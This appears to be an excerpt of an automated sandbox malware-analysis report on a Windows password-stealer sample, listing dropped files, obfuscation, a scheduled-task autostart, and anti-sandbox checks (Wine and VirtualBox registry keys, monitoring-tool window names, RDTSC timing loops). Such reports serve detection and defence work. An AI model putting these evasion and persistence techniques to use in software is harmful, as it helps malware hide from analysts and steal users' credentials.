Source: Binary string: mozglue.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Unpacked PE file: 5.2.BGIIDAEBGC.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 8.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Unpacked PE file: 11.2.a37ec701f3.exe.120000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 14.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 15.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 16.2.explorti.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vtxoxanz:EW;wrlrcnfl:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C52C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
Source: random[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0x258a45
Source: a37ec701f3.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x258a45
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: real checksum: 0x0 should be: 0x258a45
Source: BGIIDAEBGC.exe.0.dr Static PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1cc5aa should be: 0x1ceabc
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name:
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: .idata
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name:
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: vtxoxanz
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: wrlrcnfl
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: vtxoxanz
Source: amadka[1].exe.0.dr Static PE information: section name: wrlrcnfl
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: vtxoxanz
Source: explorti.exe.5.dr Static PE information: section name: wrlrcnfl
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4FB536 push ecx; ret 0_2_6C4FB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007DD82C push ecx; ret 8_2_007DD83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772B70 push 7F770002h; ret 11_2_7F772B7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772870 push 7F770002h; ret 11_2_7F77287F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770D70 push 7F770002h; ret 11_2_7F770D7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771070 push 7F770002h; ret 11_2_7F77107F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771370 push 7F770002h; ret 11_2_7F77137F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771670 push 7F770002h; ret 11_2_7F77167F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771970 push 7F770002h; ret 11_2_7F77197F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771C70 push 7F770002h; ret 11_2_7F771C7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771F70 push 7F770002h; ret 11_2_7F771F7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772270 push 7F770002h; ret 11_2_7F77227F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772570 push 7F770002h; ret 11_2_7F77257F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770B79 push ebx; mov dword ptr [esp], edx 11_2_7F7709F1
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770B79 push edi; mov dword ptr [esp], eax 11_2_7F770A89
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770B79 push eax; mov dword ptr [esp], edi 11_2_7F770B7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772C60 push 7F770002h; ret 11_2_7F772C6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772960 push 7F770002h; ret 11_2_7F77296F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770E60 push 7F770002h; ret 11_2_7F770E6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771160 push 7F770002h; ret 11_2_7F77116F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771460 push 7F770002h; ret 11_2_7F77146F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771760 push 7F770002h; ret 11_2_7F77176F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771A60 push 7F770002h; ret 11_2_7F771A6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771D60 push 7F770002h; ret 11_2_7F771D6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772060 push 7F770002h; ret 11_2_7F77206F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772360 push 7F770002h; ret 11_2_7F77236F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772660 push 7F770002h; ret 11_2_7F77266F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F772A50 push 7F770002h; ret 11_2_7F772A5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770F50 push 7F770002h; ret 11_2_7F770F5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771250 push 7F770002h; ret 11_2_7F77125F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F771550 push 7F770002h; ret 11_2_7F77155F
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name: entropy: 7.996079938920401
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name: entropy: 7.982865889891432
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name: entropy: 7.955332931380237
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: entropy: 7.97686822231914
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: vtxoxanz entropy: 7.953860739079147
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.97686822231914
Source: amadka[1].exe.0.dr Static PE information: section name: vtxoxanz entropy: 7.953860739079147
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.97686822231914
Source: explorti.exe.5.dr Static PE information: section name: vtxoxanz entropy: 7.953860739079147
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.996079938920401
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.982865889891432
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.955332931380237
Source: a37ec701f3.exe.8.dr Static PE information: section name: entropy: 7.996079938920401
Source: a37ec701f3.exe.8.dr Static PE information: section name: entropy: 7.982865889891432
Source: a37ec701f3.exe.8.dr Static PE information: section name: entropy: 7.955332931380237
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5255F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 687214 second address: 687230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F69D121AB31h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 687230 second address: 68723A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690A3E second address: 690A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690B73 second address: 690B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690B79 second address: 690B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690B7D second address: 690B84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690B84 second address: 690B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F69D121AB2Ch 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690E7D second address: 690E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 690E83 second address: 690E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F69D121AB2Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693ED0 second address: 693EE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693EE1 second address: 693EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693EE7 second address: 693F00 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F69D1080A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693F74 second address: 693F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693F94 second address: 693F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 693F98 second address: 693F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
